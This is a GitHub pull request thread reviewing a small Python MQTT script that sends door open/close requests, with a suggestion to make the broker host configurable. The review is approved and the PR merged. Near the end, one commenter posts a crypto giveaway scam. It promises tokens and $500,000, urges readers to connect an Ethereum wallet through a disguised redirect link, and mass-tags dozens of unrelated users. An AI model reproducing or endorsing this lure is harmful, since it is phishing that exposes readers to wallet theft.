### PR TITLE
Add files via upload

### PR DESCRIPTION
**Pull request by ychan2020**

### CODE REVIEW

**Comment by ShotaKameyama** [comment]
@ychan2020 I'd like to test remote access. So is it possible to avoid using "localhost"?

**Comment by ychan2020** [comment]
We could run the mosquitto in a container or VM when all set.
In this phase, we shall leave it as localhost to let the other members test and familiar with that.

**Comment by ShotaKameyama** [comment]
@ychan2020 thank you.

Can I suggest adding one more argument to test it? If we specify another argument, then we send it to the host, else localhost.

What do you think?

↓sample↓

```
import sys
from paho.mqtt import publish

host = "localhost"
if len(sys.argv) == 3:
    host = str(sys.argv[2])

if len(sys.argv) == 1:
    # Missing arguments
    print("Missing arguments.")
elif str(sys.argv[1]) == "Open":
    # Door Open request
    publish.single("Door_Request", "Open", qos=2, hostname=host)
elif str(sys.argv[1]) == "Close":
    # Door Close request
    publish.single("Door_Request", "Close", qos=2, hostname=host)
```

**Comment by ychan2020** [comment]
Revised, please check

**Review by ShotaKameyama — APPROVED** [review]
Thank you! LGTM!

**Comment by hfzi** [comment]
[Banner](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
pablasso, @xleox, @espumita, @Salmooo, @robot-oekonom, @jamwine, @AndreMiras, @Number16BusShelter, @jvalinsky, @JohnSweeney85, @MasonLyons, @longxiaofei, @larsyngvelundin, @lab18x, @ashishgopalhattimare, @nowa, @gulbinas, @rbmarliere, @luisgagocasas, @zaffrew, @Marknetreba, @yu-shin, @carsonlecky, @Zaczero, @Zoexyz77, @Daft-Wullie, @clrke, @jaxon4004, @mon-key-mike, @rahulgoel97, @mgaitan, @mdn522, @picoAMPERE, @sediri-code, @irockstar, @CaioTeixeira95, @mishidemudong, @mpdevilleres, @DreamAndDead, @nesclass, @kevinqz, @0xYYY, @suixinio, @Rhyanz46, @sarthakkaushik, @eaxecloud, @dushyantRathore, @anylayer, @emmajam, @novice-stack

**Pull request merged**
